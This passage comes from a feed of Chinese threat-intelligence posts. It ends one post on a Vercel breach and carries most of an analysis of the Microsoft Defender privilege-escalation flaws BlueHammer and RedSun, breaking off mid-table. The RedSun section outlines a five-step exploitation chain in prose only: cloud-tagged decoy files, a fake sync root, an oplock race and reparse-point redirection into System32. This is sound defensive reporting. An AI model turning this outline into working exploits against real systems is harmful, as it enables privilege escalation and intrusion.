break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心将持续关注ShinyHunters组织的活动动态，并监控该组织是否将泄露数据进一步扩散或用于二次攻击。建议所有使用Vercel平台的企业立即执行上述防御措施，并保持对最新威胁情报的关注。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://vercel.com/kb/bulletin/vercel-april-2026-security-incident" target="_blank">https://vercel.com/kb/bulletin/vercel-april-2026-security-incident</a></span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://cyberveille.ch/posts/2026-04-19-incident-de-securite-vercel-avril-2026-acces-non-autorise-via-un-outil-ia-tiers-compromis/" target="_blank">https://cyberveille.ch/posts/2026-04-19-incident-de-securite-vercel-avril-2026-acces-non-autorise-via-un-outil-ia-tiers-compromis/</a></span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/vercel-confirms-data-breach-claims-of-stolen-data-for-sale/" target="_blank">https://www.bleepingcomputer.com/news/security/vercel-confirms-data-breach-claims-of-stolen-data-for-sale/</a></span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://www.cybersecuritynews.com/vercel-confirms-data-breach-shinyhunters-claims/" target="_blank">https://www.cybersecuritynews.com/vercel-confirms-data-breach-shinyhunters-claims/</a></span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://www.hudsonrock.com/threat-intelligence/vercel-supply-chain-attack-context-ai-lumma-stealer" target="_blank">https://www.hudsonrock.com/threat-intelligence/vercel-supply-chain-attack-context-ai-lumma-stealer</a></span></p></li></ul><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=818dcdd7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518496%26idx%3D1%26sn%3D0c47ed4847403380fdfe3a8f80103b05">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 21 Apr 2026 10:04:00 +0800</pubDate>
    </item>
    <item>
      <title>微软Defender零日漏洞深度分析：从BlueHammer到RedSun，安全工具的攻防博弈</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518486&amp;idx=1&amp;sn=550ba4e79eec1f50c66aa188e04ad78e</link>
      <description>近日微软在Patch Tuesday例行更新中修复了Microsoft Defender反恶意软件平台中的一个高危零日漏洞BlueHammer，该漏洞技术细节在微软官方修复发布前即被公开披露，攻击者可能已掌握漏洞利用代码，随后安全研究员公开了针对同一安全平台的另一未修补漏洞RedSun</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-20 14:31</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9cd1d9a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9aqbrBCb7GFx0S9Tic3ErD5q7fSYDWddToIbtqbnjyw9WBmsFaFdw3ianNOaTgPsLa3fQYDD9DbvlTqjl3j5XKhkwYFJwbpn8J0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近日微软在Patch Tuesday例行更新中修复了Microsoft Defender反恶意软件平台中的一个高危零日漏洞BlueHammer，该漏洞技术细节在微软官方修复发布前即被公开披露，攻击者可能已掌握漏洞利用代码，随后安全研究员公开了针对同一安全平台的另一未修补漏洞RedSun</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2026年4月，微软在Patch Tuesday例行更新中修复了Microsoft Defender反恶意软件平台中的一个高危零日漏洞（</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CVE-2026-33825</span></strong><span leaf="">，又称BlueHammer）。该漏洞源于平台内访问控制粒度不足（</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CWE-1220</span></strong><span leaf="">），允许具备基本本地访问权限的攻击者将权限提升至最高SYSTEM级别。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">值得高度关注的是，该漏洞的技术细节在微软官方修复发布前即被公开披露，攻击者可能已掌握漏洞利用代码。更为严峻的是，安全研究员Chaotic Eclipse于4月16日公开了针对同一安全平台的另一未修补漏洞</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">RedSun</span></strong><span leaf="">，该漏洞利用Defender对云标签文件的处理逻辑缺陷，将防御工具本身转化为攻击链的一环。这两起连续披露事件反映出安全研究社区与厂商之间的信任危机，同时也预示着针对终端安全基础设施的攻击技术正在向更高阶的形态演进。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞技术分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">BlueHammer漏洞（CVE-2026-33825）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CVE-2026-33825</span></strong><span leaf=""> 是Microsoft Defender反恶意软件平台中的一个本地权限提升漏洞。攻击者利用平台内部访问控制机制的粒度不足，通过用户态二进制文件（MsMpEng.exe）与内核态驱动之间的权限边界混淆，实现从低权限用户到SYSTEM级别权限的跨越。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据微软CVSS 3.1评分体系，该漏洞获得</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">7.8分</span></strong><span leaf="">（高危），攻击特征如下：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">评估维度</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">配置值</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">风险解读</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">攻击向量</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Local（本地）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">攻击者需已获得目标系统 foothold</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">攻击复杂度</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Low（低）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞利用路径明确，稳定性高</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限要求</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Low（低）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">标准用户账户即可触发</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">用户交互</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">None（无需）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">漏洞利用可静默执行</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞的技术根因指向</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">CWE-1220</span></strong><span leaf="">（访问控制粒度不足），这意味着平台在设计层面对权限边界的控制存在结构性缺陷，而非单一的实现错误。从攻击链视角分析，此类漏洞通常作为APT攻击的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">权限提升（Privilege Escalation）</span></strong><span leaf="">环节使用，位于初始入侵之后、横向移动之前。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">RedSun漏洞：安全工具的双重属性滥用</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">RedSun漏洞代表了更高级的攻击思路：不再寻找传统意义上的代码执行缺陷，而是滥用安全产品的</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">正常功能逻辑</span></strong><span leaf="">，将其转化为攻击向量。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该漏洞的利用原理如下：当带有&#34;云标签&#34;（Cloud Tags）标记的文件被Defender检测并隔离后，平台可能触发文件&#34;恢复&#34;机制，将文件写回原始路径。攻击者正是利用这一合法行为的时序竞争条件，通过以下步骤实现权限提升：</span></p><ol class="list-paddingleft-1"><li><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">诱饵构造</span>：创建携带特定云标签的恶意文件（如伪装为EICAR测试字符串的可执行文件）</span></strong></li><li><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">虚假同步根注册</span>：利用Cloud Files API注册虚假的同步根目录，使恶意文件获得云管理特征</span></strong></li><li><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">竞争条件触发</span>：通过oplock机制协调文件系统操作时序，诱导Defender执行异常恢复行为</span></strong></li><li><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">路径重定向</span>：利用重解析点（Reparse Point）将文件操作重定向至System32等特权目录</span></strong></li><li><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-weight: bold;">权限获取</span>：最终实现将恶意可执行文件写入高权限位置，以SYSTEM上下文执行</span></strong></li></ol><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这种攻击方式的高明之处在于：它组合了多个合法的Windows子系统（NT文件操作、卷影复制服务、Cloud Files API、oplock机制、重解析点），单一行为均难以被判定为恶意，但串联使用即可形成完整的攻击链。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为体归因分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">漏洞发现者追踪</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">研究者</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">身份特征</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">关联动作</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Zen Dodd</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">独立安全研究员</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">联合报告BlueHammer漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Yuanpei XU</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">独立安全研究员</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">联合报告BlueHammer漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Chaotic Eclipse（Nightmare-Eclipse）</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 